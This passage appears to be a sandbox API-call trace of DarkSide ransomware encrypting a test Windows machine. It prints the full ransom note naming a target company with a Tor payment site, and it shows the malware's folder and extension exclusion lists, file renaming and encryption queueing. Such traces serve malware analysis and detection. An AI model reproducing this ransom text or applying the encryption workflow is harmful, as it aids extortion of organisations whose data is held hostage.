9NtjyWHbqWYTbhBpJ2ht4tKo7DQgTGmQ4IGHCFvgjiSMTNopVgQ9YIh9KRWkQgmvxviZtJGOakzykMzWKRgxwf2pCxpdMT8iGlKcsSOsxVOUXIGEgpy6tLqliTTEKWnohcYOhCF3DYMePMxEYa0eCmED1EXEG5QOZCpmkgDl5s5VSUF5uhnKsunUtKGS24iEAr2hxsJ1zMcMHmKVrf3bvRyhYVKXwlXVggxE7ncowldcK3v3CiKC24jKVd6OH5QrhVyyQLrFM5RE3Y0RcTeRTIqf1J5CIEhTiG3TH7SEpws4wfkt9RZ7rBWT4n3B69Z9JuPzyFCBwPKF7gTzEYzixIGzFbJyLSZXff9ryv3yL3JeKywAcoBafos0dLSkRgf1X1a1S2ud4kXa5GRU4W7rhCQsnJ8vAcv1AXaPRq9ESySBWQdGCQMSci0ex0oE4EfCDW3jjyXtaPofqNFhibodJFmOyTKwie1OcW6Kh6Ih6JxXXfUXr4VbRILzsiPXsOTTisDaEicID1E0SJRluBus2UhPyogJiZ7UpmUu9LUe3yAi3Bhox3pLv8E \r\n \r\n !!! DANGER !!! \r\n DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. \r\n !!! DANGER !!!") returned 0x7ca [0159.887] CreateFileW (lpFileName="README.c06622a1.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\readme.c06622a1.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0159.887] WriteFile (in: hFile=0x1bc, lpBuffer=0x17dc98*, nNumberOfBytesToWrite=0x7ca, lpNumberOfBytesWritten=0x32e8bc, lpOverlapped=0x0 | out: lpBuffer=0x17dc98*, lpNumberOfBytesWritten=0x32e8bc*=0x7ca, lpOverlapped=0x0) returned 1 [0159.888] CloseHandle (hObject=0x1bc) returned 1 [0159.888] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0159.888] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x")) returned 0x10 [0159.888] PathAddBackslashW (in: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x" | out: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\") returned="" [0159.888] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\") returned 0x2f [0159.888] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\*", fInfoLevelId=0x0, lpFindFileData=0x32eb1c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x32eb1c) returned 0x154188 [0159.888] FindNextFileW (in: hFindFile=0x154188, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe2dbab50, ftCreationTime.dwHighDateTime=0x1d5da7a, ftLastAccessTime.dwLowDateTime=0x8cff8f40, ftLastAccessTime.dwHighDateTime=0x1d6eb2b, ftLastWriteTime.dwLowDateTime=0x8cff8f40, ftLastWriteTime.dwHighDateTime=0x1d6eb2b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0159.889] FindNextFileW (in: hFindFile=0x154188, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9266cf90, ftCreationTime.dwHighDateTime=0x1d5e1b1, ftLastAccessTime.dwLowDateTime=0xf3dc9f0, ftLastAccessTime.dwHighDateTime=0x1d5dc36, ftLastWriteTime.dwLowDateTime=0xf3dc9f0, ftLastWriteTime.dwHighDateTime=0x1d5dc36, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="4lOUbG", cAlternateFileName="")) returned 1 [0159.889] _wcsicmp (_Str1="$recycle.bin", _Str2="4lOUbG") returned -16 [0159.889] wcslen (_String="$recycle.bin") returned 0xc [0159.889] _wcsicmp (_Str1="config.msi", _Str2="4lOUbG") returned 47 [0159.889] wcslen (_String="config.msi") returned 0xa [0159.889] _wcsicmp (_Str1="$windows.~bt", _Str2="4lOUbG") returned -16 [0159.889] wcslen (_String="$windows.~bt") returned 0xc [0159.889] _wcsicmp (_Str1="$windows.~ws", _Str2="4lOUbG") returned -16 [0159.889] wcslen (_String="$windows.~ws") returned 0xc [0159.889] _wcsicmp (_Str1="windows", _Str2="4lOUbG") returned 67 [0159.889] wcslen (_String="windows") returned 0x7 [0159.889] _wcsicmp (_Str1="appdata", _Str2="4lOUbG") returned 45 [0159.889] wcslen (_String="appdata") returned 0x7 [0159.889] _wcsicmp (_Str1="application data", _Str2="4lOUbG") returned 45 [0159.889] wcslen (_String="application data") returned 0x10 [0159.889] _wcsicmp (_Str1="boot", _Str2="4lOUbG") returned 46 [0159.889] wcslen (_String="boot") returned 0x4 [0159.889] _wcsicmp (_Str1="google", _Str2="4lOUbG") returned 51 [0159.889] wcslen (_String="google") returned 0x6 [0159.889] _wcsicmp (_Str1="mozilla", _Str2="4lOUbG") returned 57 [0159.889] wcslen (_String="mozilla") returned 0x7 [0159.889] _wcsicmp (_Str1="program files", _Str2="4lOUbG") returned 60 [0159.889] wcslen (_String="program files") returned 0xd [0159.889] _wcsicmp (_Str1="program files (x86)", _Str2="4lOUbG") returned 60 [0159.889] wcslen (_String="program files (x86)") returned 0x13 [0159.889] _wcsicmp (_Str1="programdata", _Str2="4lOUbG") returned 60 [0159.890] wcslen (_String="programdata") returned 0xb [0159.890] _wcsicmp (_Str1="system volume information", _Str2="4lOUbG") returned 63 [0159.890] wcslen (_String="system volume information") returned 0x19 [0159.890] _wcsicmp (_Str1="tor browser", _Str2="4lOUbG") returned 64 [0159.890] wcslen (_String="tor browser") returned 0xb [0159.890] _wcsicmp (_Str1="windows.old", _Str2="4lOUbG") returned 67 [0159.890] wcslen (_String="windows.old") returned 0xb [0159.890] _wcsicmp (_Str1="intel", _Str2="4lOUbG") returned 53 [0159.890] wcslen (_String="intel") returned 0x5 [0159.890] _wcsicmp (_Str1="msocache", _Str2="4lOUbG") returned 57 [0159.890] wcslen (_String="msocache") returned 0x8 [0159.890] _wcsicmp (_Str1="perflogs", _Str2="4lOUbG") returned 60 [0159.890] wcslen (_String="perflogs") returned 0x8 [0159.890] _wcsicmp (_Str1="x64dbg", _Str2="4lOUbG") returned 68 [0159.890] wcslen (_String="x64dbg") returned 0x6 [0159.890] _wcsicmp (_Str1="public", _Str2="4lOUbG") returned 60 [0159.890] wcslen (_String="public") returned 0x6 [0159.890] _wcsicmp (_Str1="all users", _Str2="4lOUbG") returned 45 [0159.890] wcslen (_String="all users") returned 0x9 [0159.890] _wcsicmp (_Str1="default", _Str2="4lOUbG") returned 48 [0159.890] wcslen (_String="default") returned 0x7 [0159.890] wcscpy (in: _Dest=0x3220050, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\*" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\*" [0159.890] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\*") returned 0x30 [0159.890] wcscpy (in: _Dest=0x32200ae, _Source="4lOUbG" | out: _Dest="4lOUbG") returned="4lOUbG" [0159.890] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3240060 [0159.890] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3250068 [0159.892] wcscpy (in: _Dest=0x3240060, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG" [0159.892] GetNamedSecurityInfoW () returned 0x0 [0159.892] SetEntriesInAclW () returned 0x0 [0159.892] SetNamedSecurityInfoW () returned 0x0 [0159.928] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x22bac8) returned 1 [0159.928] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x32e66c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0159.928] SetCurrentDirectoryW (lpPathName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\4loubg")) returned 1 [0159.928] strlen (_Str="----------- [ Welcome to DarkSide - I-D Foods Corporation] -------------> \r\n \r\n What happend? \r\n ---------------------------------------------- \r\n Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. \r\n But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. \r\n Follow our instructions below and you will recover all your data. \r\n \r\n What guarantees? \r\n ---------------------------------------------- \r\n We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. \r\n All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. \r\n We guarantee to decrypt one file for free. Go to the site and contact us. \r\n \r\n How to get access on website? \r\n ---------------------------------------------- \r\n Using a TOR browser: \r\n 1) Download and install TOR browser from this site: https://torproject.org/ \r\n 2) Open our website: http://darksidfqzcuhtk2.onion/LYID3U99RAJSTEYEFWS6SLYDGMUXKNAT3OPKN9D56PIGX1QHBU5DHGUN4HGMX2IW \r\n \r\n When you open our website, put the following data in the input form: \r\n Key: \r\n \r\n 9NtjyWHbqWYTbhBpJ2ht4tKo7DQgTGmQ4IGHCFvgjiSMTNopVgQ9YIh9KRWkQgmvxviZtJGOakzykMzWKRgxwf2pCxpdMT8iGlKcsSOsxVOUXIGEgpy6tLqliTTEKWnohcYOhCF3DYMePMxEYa0eCmED1EXEG5QOZCpmkgDl5s5VSUF5uhnKsunUtKGS24iEAr2hxsJ1zMcMHmKVrf3bvRyhYVKXwlXVggxE7ncowldcK3v3CiKC24jKVd6OH5QrhVyyQLrFM5RE3Y0RcTeRTIqf1J5CIEhTiG3TH7SEpws4wfkt9RZ7rBWT4n3B69Z9JuPzyFCBwPKF7gTzEYzixIGzFbJyLSZXff9ryv3yL3JeKywAcoBafos0dLSkRgf1X1a1S2ud4kXa5GRU4W7rhCQsnJ8vAcv1AXaPRq9ESySBWQdGCQMSci0ex0oE4EfCDW3jjyXtaPofqNFhibodJFmOyTKwie1OcW6Kh6Ih6JxXXfUXr4VbRILzsiPXsOTTisDaEicID1E0SJRluBus2UhPyogJiZ7UpmUu9LUe3yAi3Bhox3pLv8E \r\n \r\n !!! DANGER !!! \r\n DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. \r\n !!! DANGER !!!") returned 0x7ca [0159.928] CreateFileW (lpFileName="README.c06622a1.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\4loubg\\readme.c06622a1.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0159.929] WriteFile (in: hFile=0x1bc, lpBuffer=0x17dc98*, nNumberOfBytesToWrite=0x7ca, lpNumberOfBytesWritten=0x32e63c, lpOverlapped=0x0 | out: lpBuffer=0x17dc98*, lpNumberOfBytesWritten=0x32e63c*=0x7ca, lpOverlapped=0x0) returned 1 [0159.930] CloseHandle (hObject=0x1bc) returned 1 [0159.930] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0159.930] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\4loubg")) returned 0x10 [0159.930] PathAddBackslashW (in: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG" | out: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG\\") returned="" [0159.930] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG\\") returned 0x36 [0159.930] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG\\*", fInfoLevelId=0x0, lpFindFileData=0x32e89c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x32e89c) returned 0x1541c8 [0159.930] FindNextFileW (in: hFindFile=0x1541c8, lpFindFileData=0x32e89c | out: lpFindFileData=0x32e89c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9266cf90, ftCreationTime.dwHighDateTime=0x1d5e1b1, ftLastAccessTime.dwLowDateTime=0x8d06b360, ftLastAccessTime.dwHighDateTime=0x1d6eb2b, ftLastWriteTime.dwLowDateTime=0x8d06b360, ftLastWriteTime.dwHighDateTime=0x1d6eb2b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0159.931] FindNextFileW (in: hFindFile=0x1541c8, lpFindFileData=0x32e89c | out: lpFindFileData=0x32e89c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6013d760, ftCreationTime.dwHighDateTime=0x1d5e2c7, ftLastAccessTime.dwLowDateTime=0x91125600, ftLastAccessTime.dwHighDateTime=0x1d5e3c8, ftLastWriteTime.dwLowDateTime=0x91125600, ftLastWriteTime.dwHighDateTime=0x1d5e3c8, nFileSizeHigh=0x0, nFileSizeLow=0x15ff, dwReserved0=0x0, dwReserved1=0x0, cFileName="hP5prE.m4a", cAlternateFileName="")) returned 1 [0159.931] _wcsicmp (_Str1="hP5prE.m4a", _Str2="README.c06622a1.TXT") returned -10 [0159.931] wcsstr (_Str="hP5prE.m4a", _SubStr="README") returned 0x0 [0159.931] _wcsicmp (_Str1="autorun.inf", _Str2="hP5prE.m4a") returned -7 [0159.931] wcslen (_String="autorun.inf") returned 0xb [0159.931] _wcsicmp (_Str1="boot.ini", _Str2="hP5prE.m4a") returned -6 [0159.931] wcslen (_String="boot.ini") returned 0x8 [0159.931] _wcsicmp (_Str1="bootfont.bin", _Str2="hP5prE.m4a") returned -6 [0159.931] wcslen (_String="bootfont.bin") returned 0xc [0159.931] _wcsicmp (_Str1="bootsect.bak", _Str2="hP5prE.m4a") returned -6 [0159.931] wcslen (_String="bootsect.bak") returned 0xc [0159.932] _wcsicmp (_Str1="desktop.ini", _Str2="hP5prE.m4a") returned -4 [0159.932] wcslen (_String="desktop.ini") returned 0xb [0159.932] _wcsicmp (_Str1="iconcache.db", _Str2="hP5prE.m4a") returned 1 [0159.932] wcslen (_String="iconcache.db") returned 0xc [0159.932] _wcsicmp (_Str1="ntldr", _Str2="hP5prE.m4a") returned 6 [0159.932] wcslen (_String="ntldr") returned 0x5 [0159.932] _wcsicmp (_Str1="ntuser.dat", _Str2="hP5prE.m4a") returned 6 [0159.932] wcslen (_String="ntuser.dat") returned 0xa [0159.932] _wcsicmp (_Str1="ntuser.dat.log", _Str2="hP5prE.m4a") returned 6 [0159.932] wcslen (_String="ntuser.dat.log") returned 0xe [0159.932] _wcsicmp (_Str1="ntuser.ini", _Str2="hP5prE.m4a") returned 6 [0159.932] wcslen (_String="ntuser.ini") returned 0xa [0159.932] _wcsicmp (_Str1="thumbs.db", _Str2="hP5prE.m4a") returned 12 [0159.932] wcslen (_String="thumbs.db") returned 0x9 [0159.932] _wcsicmp (_Str1="386", _Str2="m4a") returned -58 [0159.932] wcslen (_String="386") returned 0x3 [0159.932] _wcsicmp (_Str1="adv", _Str2="m4a") returned -12 [0159.932] wcslen (_String="adv") returned 0x3 [0159.932] _wcsicmp (_Str1="ani", _Str2="m4a") returned -12 [0159.932] wcslen (_String="ani") returned 0x3 [0159.932] _wcsicmp (_Str1="bat", _Str2="m4a") returned -11 [0159.932] wcslen (_String="bat") returned 0x3 [0159.932] _wcsicmp (_Str1="bin", _Str2="m4a") returned -11 [0159.932] wcslen (_String="bin") returned 0x3 [0159.932] _wcsicmp (_Str1="cab", _Str2="m4a") returned -10 [0159.932] wcslen (_String="cab") returned 0x3 [0159.932] _wcsicmp (_Str1="cmd", _Str2="m4a") returned -10 [0159.932] wcslen (_String="cmd") returned 0x3 [0159.932] _wcsicmp (_Str1="com", _Str2="m4a") returned -10 [0159.932] wcslen (_String="com") returned 0x3 [0159.932] _wcsicmp (_Str1="cpl", _Str2="m4a") returned -10 [0159.932] wcslen (_String="cpl") returned 0x3 [0159.932] _wcsicmp (_Str1="cur", _Str2="m4a") returned -10 [0159.932] wcslen (_String="cur") returned 0x3 [0159.932] _wcsicmp (_Str1="deskthemepack", _Str2="m4a") returned -9 [0159.932] wcslen (_String="deskthemepack") returned 0xd [0159.933] _wcsicmp (_Str1="diagcab", _Str2="m4a") returned -9 [0159.933] wcslen (_String="diagcab") returned 0x7 [0159.933] _wcsicmp (_Str1="diagcfg", _Str2="m4a") returned -9 [0159.933] wcslen (_String="diagcfg") returned 0x7 [0159.933] _wcsicmp (_Str1="diagpkg", _Str2="m4a") returned -9 [0159.933] wcslen (_String="diagpkg") returned 0x7 [0159.933] _wcsicmp (_Str1="dll", _Str2="m4a") returned -9 [0159.933] wcslen (_String="dll") returned 0x3 [0159.933] _wcsicmp (_Str1="drv", _Str2="m4a") returned -9 [0159.933] wcslen (_String="drv") returned 0x3 [0159.933] _wcsicmp (_Str1="exe", _Str2="m4a") returned -8 [0159.933] wcslen (_String="exe") returned 0x3 [0159.933] _wcsicmp (_Str1="hlp", _Str2="m4a") returned -5 [0159.933] wcslen (_String="hlp") returned 0x3 [0159.933] _wcsicmp (_Str1="icl", _Str2="m4a") returned -4 [0159.933] wcslen (_String="icl") returned 0x3 [0159.933] _wcsicmp (_Str1="icns", _Str2="m4a") returned -4 [0159.933] wcslen (_String="icns") returned 0x4 [0159.933] _wcsicmp (_Str1="ico", _Str2="m4a") returned -4 [0159.933] wcslen (_String="ico") returned 0x3 [0159.933] _wcsicmp (_Str1="ics", _Str2="m4a") returned -4 [0159.933] wcslen (_String="ics") returned 0x3 [0159.933] _wcsicmp (_Str1="idx", _Str2="m4a") returned -4 [0159.933] wcslen (_String="idx") returned 0x3 [0159.933] _wcsicmp (_Str1="ldf", _Str2="m4a") returned -1 [0159.933] wcslen (_String="ldf") returned 0x3 [0159.933] _wcsicmp (_Str1="lnk", _Str2="m4a") returned -1 [0159.933] wcslen (_String="lnk") returned 0x3 [0159.933] _wcsicmp (_Str1="mod", _Str2="m4a") returned 59 [0159.933] wcslen (_String="mod") returned 0x3 [0159.933] _wcsicmp (_Str1="mpa", _Str2="m4a") returned 60 [0159.933] wcslen (_String="mpa") returned 0x3 [0159.933] _wcsicmp (_Str1="msc", _Str2="m4a") returned 63 [0159.933] wcslen (_String="msc") returned 0x3 [0159.933] _wcsicmp (_Str1="msp", _Str2="m4a") returned 63 [0159.933] wcslen (_String="msp") returned 0x3 [0159.933] _wcsicmp (_Str1="msstyles", _Str2="m4a") returned 63 [0159.933] wcslen (_String="msstyles") returned 0x8 [0159.934] _wcsicmp (_Str1="msu", _Str2="m4a") returned 63 [0159.934] wcslen (_String="msu") returned 0x3 [0159.934] _wcsicmp (_Str1="nls", _Str2="m4a") returned 1 [0159.934] wcslen (_String="nls") returned 0x3 [0159.934] _wcsicmp (_Str1="nomedia", _Str2="m4a") returned 1 [0159.934] wcslen (_String="nomedia") returned 0x7 [0159.934] _wcsicmp (_Str1="ocx", _Str2="m4a") returned 2 [0159.934] wcslen (_String="ocx") returned 0x3 [0159.934] _wcsicmp (_Str1="prf", _Str2="m4a") returned 3 [0159.934] wcslen (_String="prf") returned 0x3 [0159.934] _wcsicmp (_Str1="ps1", _Str2="m4a") returned 3 [0159.934] wcslen (_String="ps1") returned 0x3 [0159.934] _wcsicmp (_Str1="rom", _Str2="m4a") returned 5 [0159.934] wcslen (_String="rom") returned 0x3 [0159.934] _wcsicmp (_Str1="rtp", _Str2="m4a") returned 5 [0159.934] wcslen (_String="rtp") returned 0x3 [0159.934] _wcsicmp (_Str1="scr", _Str2="m4a") returned 6 [0159.934] wcslen (_String="scr") returned 0x3 [0159.934] _wcsicmp (_Str1="shs", _Str2="m4a") returned 6 [0159.934] wcslen (_String="shs") returned 0x3 [0159.934] _wcsicmp (_Str1="spl", _Str2="m4a") returned 6 [0159.934] wcslen (_String="spl") returned 0x3 [0159.934] _wcsicmp (_Str1="sys", _Str2="m4a") returned 6 [0159.934] wcslen (_String="sys") returned 0x3 [0159.934] _wcsicmp (_Str1="theme", _Str2="m4a") returned 7 [0159.934] wcslen (_String="theme") returned 0x5 [0159.934] _wcsicmp (_Str1="themepack", _Str2="m4a") returned 7 [0159.934] wcslen (_String="themepack") returned 0x9 [0159.934] _wcsicmp (_Str1="wpx", _Str2="m4a") returned 10 [0159.934] wcslen (_String="wpx") returned 0x3 [0159.934] _wcsicmp (_Str1="lock", _Str2="m4a") returned -1 [0159.934] wcslen (_String="lock") returned 0x4 [0159.934] _wcsicmp (_Str1="key", _Str2="m4a") returned -2 [0159.934] wcslen (_String="key") returned 0x3 [0159.934] _wcsicmp (_Str1="hta", _Str2="m4a") returned -5 [0159.934] wcslen (_String="hta") returned 0x3 [0159.934] _wcsicmp (_Str1="msi", _Str2="m4a") returned 63 [0159.934] wcslen (_String="msi") returned 0x3 [0159.935] _wcsicmp (_Str1="pdb", _Str2="m4a") returned 3 [0159.935] wcslen (_String="pdb") returned 0x3 [0159.935] _wcsicmp (_Str1="sqlite", _Str2="m4a") returned 6 [0159.935] wcslen (_String="sqlite") returned 0x6 [0159.935] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\4loubg")) returned 0x10 [0159.935] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3272078 [0159.935] wcscpy (in: _Dest=0x3272078, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG" [0159.935] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG") returned 0x35 [0159.935] wcscpy (in: _Dest=0x32720e4, _Source="hP5prE.m4a" | out: _Dest="hP5prE.m4a") returned="hP5prE.m4a" [0159.935] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG\\hP5prE.m4a", dwFileAttributes=0x80) returned 1 [0159.935] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG\\hP5prE.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\4loubg\\hp5pre.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b4 [0159.936] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0159.936] ReadFile (in: hFile=0x1b4, lpBuffer=0x32e724, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32e7b4, lpOverlapped=0x0 | out: lpBuffer=0x32e724*, lpNumberOfBytesRead=0x32e7b4*=0x90, lpOverlapped=0x0) returned 1 [0159.936] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32e724, Length=0x80) returned 0x9779b03c [0159.936] RtlComputeCrc32 (PartialCrc=0xb03c, Buffer=0x32e724, Length=0x80) returned 0x3d9bd433 [0159.936] RtlComputeCrc32 (PartialCrc=0xd433, Buffer=0x32e724, Length=0x80) returned 0x12aa5e11 [0159.936] RtlComputeCrc32 (PartialCrc=0x5e11, Buffer=0x32e724, Length=0x80) returned 0x8bc0d64b [0159.936] RtlComputeCrc32 (PartialCrc=0xd64b, Buffer=0x32e724, Length=0x80) returned 0xff98933b [0159.937] CloseHandle (hObject=0x1b4) returned 1 [0159.937] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3282080 [0159.937] wcscpy (in: _Dest=0x3282080, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG\\hP5prE.m4a" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG\\hP5prE.m4a") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG\\hP5prE.m4a" [0159.937] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG\\hP5prE.m4a") returned 0x40 [0159.937] wcscpy (in: _Dest=0x3282100, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0159.937] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG\\hP5prE.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\4loubg\\hp5pre.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG\\hP5prE.m4a.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\4loubg\\hp5pre.m4a.c06622a1"), dwFlags=0x8) returned 1 [0159.941] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG\\hP5prE.m4a.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\4loubg\\hp5pre.m4a.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1b4 [0159.941] CreateIoCompletionPort (FileHandle=0x1b4, ExistingCompletionPort=0xd8, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0xd8 [0159.941] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x710020 [0159.945] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x6c9aa5d2 [0159.945] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x640e510f [0159.945] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0xb6b0cc7 [0159.945] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x2db388ad [0159.945] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x1d480843 [0159.945] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x4aa1d511 [0159.945] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x292c479d [0159.945] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x22ebd49c [0159.948] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x710094, Length=0x80) returned 0x3314dd86 [0159.948] RtlComputeCrc32 (PartialCrc=0xdd86, Buffer=0x710094, Length=0x80) returned 0xa527f59d [0159.948] RtlComputeCrc32 (PartialCrc=0xf59d, Buffer=0x710094, Length=0x80) returned 0x3182a0db [0159.948] RtlComputeCrc32 (PartialCrc=0xa0db, Buffer=0x710094, Length=0x80) returned 0xb7475e4e [0159.948] RtlComputeCrc32 (PartialCrc=0x5e4e, Buffer=0x710094, Length=0x80) returned 0x2a3d6d09 [0159.948] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x710020) returned 1 [0159.949] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3272078) returned 1 [0159.949] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3282080) returned 1 [0159.949] FindNextFileW (in: hFindFile=0x1541c8, 